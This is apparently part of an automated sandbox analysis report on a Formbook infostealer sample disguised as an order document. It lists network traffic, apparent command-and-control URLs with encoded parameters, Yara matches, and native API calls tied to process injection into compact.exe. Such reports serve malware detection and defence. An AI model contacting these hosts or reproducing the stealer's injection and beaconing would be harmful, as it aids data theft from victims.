                Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                Content-Encoding: gzip
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Date: Wed, 03 Jul 2024 15:58:05 GMT
                Server: Apache
                X-Powered-By: PHP/8.2.20
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <http://architect-usschool.com/wp-json/>; rel="https://api.w.org/"
                Content-Encoding: gzip
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache, must-revalidate, max-age=0
                content-type: text/html; charset=UTF-8
                link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
                x-tec-api-version: v1
                x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
                x-tec-api-origin: https://superunicornpalace.com
                transfer-encoding: chunked
                content-encoding: gzip
                vary: Accept-Encoding
                date: Wed, 03 Jul 2024 15:58:27 GMT
                server: LiteSpeed
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache, must-revalidate, max-age=0
                content-type: text/html; charset=UTF-8
                link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
                x-tec-api-version: v1
                x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
                x-tec-api-origin: https://superunicornpalace.com
                transfer-encoding: chunked
                content-encoding: gzip
                vary: Accept-Encoding
                date: Wed, 03 Jul 2024 15:58:30 GMT
                server: LiteSpeed
            Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Connection: close
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache, must-revalidate, max-age=0
                content-type: text/html; charset=UTF-8
                link: <https://superunicornpalace.com/wp-json/>; rel="https://api.w.org/"
                x-tec-api-version: v1
                x-tec-api-root: https://superunicornpalace.com/wp-json/tribe/events/v1/
                x-tec-api-origin: https://superunicornpalace.com
                transfer-encoding: chunked
                content-encoding: gzip
                vary: Accept-Encoding
                date: Wed, 03 Jul 2024 15:58:33 GMT
                server: LiteSpeed
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 16:00:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingLast-Modified: Tue, 07 Nov 2023 07:43:14 GMTETag: W/"afe-6098b1f8c138d"Content-Encoding: gzipData Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f 
fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 03 Jul 2024 16:00:26 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT ETag: W/"afe-6098b1f8c138d" Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 03 Jul 2024 16:00:28 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT ETag: W/"afe-6098b1f8c138d" Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 03 Jul 2024 16:00:31 GMT Content-Type: text/html Content-Length: 2814 Connection: close Vary: Accept-Encoding Last-Modified: Tue, 07 Nov 2023 07:43:14 GMT ETag: "afe-6098b1f8c138d"
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 15:59:17 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 1566 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 15:59:19 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 1566 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 15:59:22 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 1566 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 03 Jul 2024 15:59:24 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 1728 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004F98000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003D28000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://3cubesinterior.in/n8zi/?Y6vp=3PLd8j&OdjTHtuX=TDN237cw9XQsPbq3g6hYHsVRIrTNU69YOKlE8puzfHXbytTX
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004950000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.00000000036E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://architect-usschool.com/s24g/?Y6vp=3PLd8j&OdjTHtuX=4rIlPCx72NWCI0QJXJwD
            Source: compact.exe, 0000000A.00000002.4574298276.000000000449A000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.000000000322A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://epicbazaarhub.com/2769/?OdjTHtuX=rQ9MRvShllEvhf19NmQGPjdBfvwxqGfh/iQ/JyzvIKd3JVnhiEf6Ad8S1fm4
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2120287530.0000000002953000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004176000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000002F06000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://searchdiscovered.com/__media__/images/logo.gif)
            Source: compact.exe, 0000000A.00000002.4574298276.0000000004C74000.00000004.10000000.00040000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4571971139.0000000003A04000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://superunicornpalace.com/mwa4/?Y6vp=3PLd8j&OdjTHtuX=BKtoJfTGgHJzrpd1kXP6JuCpnJS0Vaq/yhZppoO2EP3
            Source: EUSOiCcoIEEJJ.exe, 0000000D.00000002.4576370278.0000000004E30000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hondamechanic.today
            Source: EUSOiCcoIEEJJ.exe, 0000000D.00000002.4576370278.0000000004E30000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.hondamechanic.today/pv57/

            E-Banking Fraud

            Source: Yara match File source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.77e0000.5.raw.unpack, -Module-.cs Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.27bc388.0.raw.unpack, -Module-.cs Large array initialization: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E: array initializer size 3088
            Source: initial sample Static PE information: Filename: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_0042B683 NtClose,5_2_0042B683
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2B60 NtClose,LdrInitializeThunk,5_2_013F2B60
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_013F2DF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_013F2C70
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F35C0 NtCreateMutant,LdrInitializeThunk,5_2_013F35C0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F4340 NtSetContextThread,5_2_013F4340
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F4650 NtSuspendThread,5_2_013F4650
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2BA0 NtEnumerateValueKey,5_2_013F2BA0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2B80 NtQueryInformationFile,5_2_013F2B80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2BF0 NtAllocateVirtualMemory,5_2_013F2BF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2BE0 NtQueryValueKey,5_2_013F2BE0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2AB0 NtWaitForSingleObject,5_2_013F2AB0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2AF0 NtWriteFile,5_2_013F2AF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2AD0 NtReadFile,5_2_013F2AD0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2D30 NtUnmapViewOfSection,5_2_013F2D30
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2D10 NtMapViewOfSection,5_2_013F2D10
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2D00 NtSetInformationFile,5_2_013F2D00
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2DB0 NtEnumerateKey,5_2_013F2DB0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2DD0 NtDelayExecution,5_2_013F2DD0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2C00 NtQueryInformationProcess,5_2_013F2C00
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2C60 NtCreateKey,5_2_013F2C60
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2CA0 NtQueryInformationToken,5_2_013F2CA0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2CF0 NtOpenProcess,5_2_013F2CF0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2CC0 NtQueryVirtualMemory,5_2_013F2CC0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2F30 NtCreateSection,5_2_013F2F30
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2F60 NtCreateProcessEx,5_2_013F2F60
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2FB0 NtResumeThread,5_2_013F2FB0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2FA0 NtQuerySection,5_2_013F2FA0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2F90 NtProtectVirtualMemory,5_2_013F2F90
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2FE0 NtCreateFile,5_2_013F2FE0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2E30 NtWriteVirtualMemory,5_2_013F2E30
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2EA0 NtAdjustPrivilegesToken,5_2_013F2EA0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2E80 NtReadVirtualMemory,5_2_013F2E80
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F2EE0 NtQueueApcThread,5_2_013F2EE0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F3010 NtOpenDirectoryObject,5_2_013F3010
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F3090 NtSetValueKey,5_2_013F3090
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F39B0 NtGetContextThread,5_2_013F39B0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F3D10 NtOpenProcessToken,5_2_013F3D10
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe Code function: 5_2_013F3D70 NtOpenThread,5_2_013F3D70
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03604340 NtSetContextThread,LdrInitializeThunk,10_2_03604340
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03604650 NtSuspendThread,LdrInitializeThunk,10_2_03604650
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602B60 NtClose,LdrInitializeThunk,10_2_03602B60
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602BE0 NtQueryValueKey,LdrInitializeThunk,10_2_03602BE0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_03602BF0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_03602BA0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602AF0 NtWriteFile,LdrInitializeThunk,10_2_03602AF0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602AD0 NtReadFile,LdrInitializeThunk,10_2_03602AD0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602F30 NtCreateSection,LdrInitializeThunk,10_2_03602F30
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602FE0 NtCreateFile,LdrInitializeThunk,10_2_03602FE0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602FB0 NtResumeThread,LdrInitializeThunk,10_2_03602FB0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602EE0 NtQueueApcThread,LdrInitializeThunk,10_2_03602EE0
            Source: C:\Windows\SysWOW64\compact.exe Code function: 10_2_03602E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_03602E80
